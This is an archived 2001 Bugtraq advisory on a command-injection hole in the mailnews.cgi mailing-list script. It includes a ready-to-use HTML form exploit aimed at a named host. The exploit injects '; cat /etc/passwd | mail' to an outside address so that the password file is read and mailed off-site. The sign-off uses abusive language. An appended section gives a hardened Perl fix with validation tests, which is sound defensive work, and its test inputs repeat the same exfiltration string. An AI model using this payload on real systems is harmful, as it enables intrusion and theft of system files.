[19277] in bugtraq
CGI - mailnews.cgi vulnerability...
daemon@ATHENA.MIT.EDU (Kanedaaa Bohater)
Mon Feb 19 18:33:04 2001
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.BSF.4.32.0102182158240.35632-100000@ac.pl>
Date: Sun, 18 Feb 2001 22:04:54 +0000
Reply-To: Kanedaaa Bohater <kaneda@AC.PL>
From: Kanedaaa Bohater <kaneda@AC.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Hello BuGReaders...
##Script: mailnews.cgi
##Introduction:
<cat from source>
CGI-Script MAILNEWS 1.3
This script helps you to maintain a mailinglist.
</cat>
##Tested Version: 1.1, 1.3
The author doesn't parse some characters and he uses a very stupid "password
protection". We can add or delete users from the mailing list without knowing the
admin password. But this is a small problem ;]. Let's see what more we can do.
<cat source>
open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
</cat>
where $mailprog [default] is sendmail and $member is the users from the users file.
Now we can do something like this. Add the user "; cat /etc/passwd | mail
adam@malysz.pl" and use the subroutine to execute this code :]
Simple exploit in HTML:
<HTML>
<BODY>
<FORM
ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
<INPUT type=hidden NAME="action" value="subscribe">
<BR>
User to add with ; [ex: "; cat /etc/passwd |mail adam@malysz.pl"
without quotes, of course ]<INPUT NAME="address" TYPE="TEXT">
<INPUT TYPE="SUBMIT" VALUE="Submit">
</FORM>
<BR>
<A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news">
Execute command :] </A>
<CENTER> Peace... </CENTER>
</BODY>
</HTML>
Who : Kanedaaa
kaneda@ac.pl
***$$$### " And maybe very many will not understand these words...
But there is no mercy for SONS OF BITCHES .... " ###$$*
kaneda@ac.pl Bohater ... Boss ... Abuser ... Cucumber Team Member... Bzz..
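Added example, not from the original post or from the MAILNEWS script: a hardened replacement for the piped `open()` quoted above, the way a maintainer would fix it. Two changes remove the injection. First, the address is checked against a strict allow-list pattern before it is used anywhere. Second, `open()` is called in list form with the `|-` mode, so Perl execs `$mailprog` directly and no shell ever parses `$member`. The sendmail path, the `-oi` flag and the sample addresses are assumptions for illustration.

```perl
#!/usr/bin/perl
# Added example (not the MAILNEWS script): hardened version of
#   open (MAIL, "|$mailprog $member") || die ...
# The original interpolates $member into a shell command line, so any
# shell metacharacter in a subscriber address becomes a command.
use strict;
use warnings;

# Assumed path; the original script's $mailprog defaults to sendmail.
my $mailprog = '/usr/sbin/sendmail';

# Allow-list check. Only characters that can appear in a plain mailbox
# address are accepted; anything else (';', '|', '`', '$', spaces, ...)
# is rejected rather than escaped. The local part must start with an
# alphanumeric so the value can never be mistaken for a mailer option.
sub valid_address {
    my ($addr) = @_;
    return 0 unless defined $addr;
    return 0 if length($addr) > 254;
    return $addr =~ /\A[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\z/ ? 1 : 0;
}

# Hardened delivery. Returns 1 on success, 0 if the address is rejected
# or the mailer cannot be started / exits non-zero.
sub send_to_member {
    my ($member, $subject, $body) = @_;
    return 0 unless valid_address($member);

    # List-form open with "|-": the argument list is passed straight to
    # exec(), so the shell interpolation of "|$mailprog $member" is gone.
    # -oi (assumed sendmail flag) keeps a lone "." line from ending input.
    open(my $mail, '|-', $mailprog, '-oi', $member)
        or return 0;
    print {$mail} "To: $member\n";
    print {$mail} "Subject: $subject\n\n";
    print {$mail} "$body\n";
    close($mail) or return 0;   # false if sendmail exits non-zero
    return 1;
}

# Constructed inputs: one legitimate subscriber and values carrying the
# kind of shell metacharacters the advisory describes. Only the first
# would ever reach sendmail.
my @candidates = (
    'user@example.com',
    '; cat /etc/passwd | mail attacker@example.com',
    '`id`@example.com',
    'user@example.com;id',
    '-bs@example.com',
);
for my $c (@candidates) {
    printf "%-50s %s\n", $c, valid_address($c) ? 'accepted' : 'REJECTED';
}
```

Running the script prints one line per candidate; only `user@example.com` is accepted. Running the CGI under taint mode (`perl -T`) is a useful second layer: Perl then refuses to pass unvalidated request data to `open` or `system` at all, which would have flagged the original one-liner.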